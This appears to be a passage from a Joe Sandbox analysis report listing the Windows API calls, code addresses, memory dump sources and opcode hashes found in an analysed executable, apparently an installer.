                                                                                                                                        • Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
                                                                                                                                        APIs
                                                                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 00423249
                                                                                                                                        • LoadCursorA.USER32(00000000,00000000), ref: 00423273
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CursorLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3238433803-0
                                                                                                                                        • Opcode ID: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                                                                        • Instruction ID: 5e34cf6406f075c2c63d733b1f02ef4b9a88184ee1572dc0f3c8875cc615d59b
                                                                                                                                        • Opcode Fuzzy Hash: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                                                                        • Instruction Fuzzy Hash: 9EF0A711B04254AADA109E7E6CC0D6B72A8DF82735B61037BFA3EC72D1C62E1D414569
                                                                                                                                        APIs
                                                                                                                                        • LocalAlloc.KERNEL32(00000000,00000644,?,0049B450,004013A3,?,?,00401443,?,?,?,?,?,00401983), ref: 00401353
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocLocal
                                                                                                                                        • String ID: tuuu
                                                                                                                                        • API String ID: 3494564517-3300879914
                                                                                                                                        • Opcode ID: 833cffc3d4ae6fddf196a7017a3fa962a39b4640526386715143ff6d9bbaf8a6
                                                                                                                                        • Instruction ID: 71c91fbc4c3ed8fd369fb1531a6952d3d9178ec9d6227f0a2e7a8dd8dab45303
                                                                                                                                        • Opcode Fuzzy Hash: 833cffc3d4ae6fddf196a7017a3fa962a39b4640526386715143ff6d9bbaf8a6
                                                                                                                                        • Instruction Fuzzy Hash: 0CF05E717013018FE724CF29D980656B7E1EBA9365F24807EE5C5D7761D3358C419B94
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                                        • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLibraryLoadMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2987862817-0
                                                                                                                                        • Opcode ID: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                                                                        • Instruction ID: 14c2566281f292fbf4bc3f3871eddb8f7eb4f11f4d1149329263d7d1c8790498
                                                                                                                                        • Opcode Fuzzy Hash: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                                                                        • Instruction Fuzzy Hash: 02F08970B147447FDB119F779CA241BBBECDB49B1175249B6F800A3591E53C4910C928
                                                                                                                                        APIs
                                                                                                                                        • SHGetKnownFolderPath.SHELL32(00499D40,00008000,00000000,?), ref: 0047C89B
                                                                                                                                        • CoTaskMemFree.OLE32(?,0047C8DE), ref: 0047C8D1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FolderFreeKnownPathTask
                                                                                                                                        • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                                                                        • API String ID: 969438705-544719455
                                                                                                                                        • Opcode ID: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                                                                        • Instruction ID: f48ec61de784b6bea0373c7a91bc006da4a0813e938d35ae17fa89473a65de5f
                                                                                                                                        • Opcode Fuzzy Hash: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                                                                        • Instruction Fuzzy Hash: 22E09230340604BFEB15EB61DC92F6977A8EB48B01B72847BF504E2680D67CAD00DB1C
                                                                                                                                        APIs
                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
                                                                                                                                          • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$FilePointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1156039329-0
                                                                                                                                        • Opcode ID: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                                                                        • Instruction ID: 32d43412562f4d6ab64aa8be608e77008e370c57458e4df53f7444e76f76d0cb
                                                                                                                                        • Opcode Fuzzy Hash: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                                                                        • Instruction Fuzzy Hash: 0EE012E93042015BF700EA6599C1B2F22DCDB44315F00446ABD44CA28BE678CC048B29
                                                                                                                                        APIs
                                                                                                                                        • GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
                                                                                                                                          • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
                                                                                                                                          • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1658689577-0
                                                                                                                                        • Opcode ID: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                                                                        • Instruction ID: 9026c6f0acc6bf601755118861b832b1e3c4c92574a9a05948c89544872af2a3
                                                                                                                                        • Opcode Fuzzy Hash: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                                                                        • Instruction Fuzzy Hash: 47314E35E00109ABCB00EB55CC819EEB779EF84314F558577E815BB286EB38AA018B98
                                                                                                                                        APIs
                                                                                                                                        • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoScroll
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 629608716-0
                                                                                                                                        • Opcode ID: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                                                                        • Instruction ID: 6365c2cd079840e4170b7c9ce409c3d873e807bce8729d2e10e5c00059922083
                                                                                                                                        • Opcode Fuzzy Hash: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                                                                        • Instruction Fuzzy Hash: D8214FB1608746AFC351DF3984407A6BBE4BB48344F14893EE498C3741E778E99ACBD6
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                                                                          • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                                                                        • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
                                                                                                                                          • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
                                                                                                                                          • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3319771486-0
                                                                                                                                        • Opcode ID: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                                                                        • Instruction ID: eef1953176fed27c4f60a3b97998f4e8fb1447464a393d6256780c84e8a913cd
                                                                                                                                        • Opcode Fuzzy Hash: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                                                                        • Instruction Fuzzy Hash: 5AF0B471248300BFE705DF62ECA6B35B6E8D748714F61047BF40886590E97D5844D51E
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3934441357-0
                                                                                                                                        • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                                                        • Instruction ID: 51b66c86ab1fb2ed9abdb0db83839a26410808368eb32e0cb4295e2ee82716ff
                                                                                                                                        • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                                                        • Instruction Fuzzy Hash: 09F04970608109EBBB1CCF58D0618AF7BA0EB48300F2080AFE907C7BA0D634AA80D658
                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 716092398-0
                                                                                                                                        • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                                                                        • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                                                                                                        • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                                                                        • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                                                                                                        APIs
                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                        • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                                                        • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                                                                        • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                                                        • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                        • Opcode ID: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                                                                        • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                                                                                        • Opcode Fuzzy Hash: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                                                                        • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                                                                        • Instruction ID: d3c11148bbbe1678040d416a6bc301cfea82702c80b798926358c5e84281cc0e
                                                                                                                                        • Opcode Fuzzy Hash: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                                                                        • Instruction Fuzzy Hash: 80E065B1304304BFD701EB66EC92A5EBAACDB49754BA14876B50097592D5B86E008468
                                                                                                                                        APIs
                                                                                                                                        • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FormatMessage
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1306739567-0
                                                                                                                                        • Opcode ID: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                                                                        • Instruction ID: fbc307da5c1359fbfbc351051067b699ae1438aedf6613c80dda169529e76e7e
                                                                                                                                        • Opcode Fuzzy Hash: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                                                                        • Instruction Fuzzy Hash: BCE0206278431116F2353416AC47B77150E43C0708F944027BB90DF3D3D6AF9945D25E
                                                                                                                                        APIs
                                                                                                                                        • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF9B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExtentPointText
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 566491939-0
                                                                                                                                        • Opcode ID: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                                                                        • Instruction ID: 6b43be1268843882f9474f888990ee0a0f71ddbfb678ee1088bae751a0726d8f
                                                                                                                                        • Opcode Fuzzy Hash: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                                                                        • Instruction Fuzzy Hash: E3E086F13097102BD600E67E1DC19DB77DC8A483697148177F458E7392D62DDE1A43AE
                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 716092398-0
                                                                                                                                        • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                                                        • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                                                                                                        • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                                                        • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                                                                                                        APIs
                                                                                                                                        • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
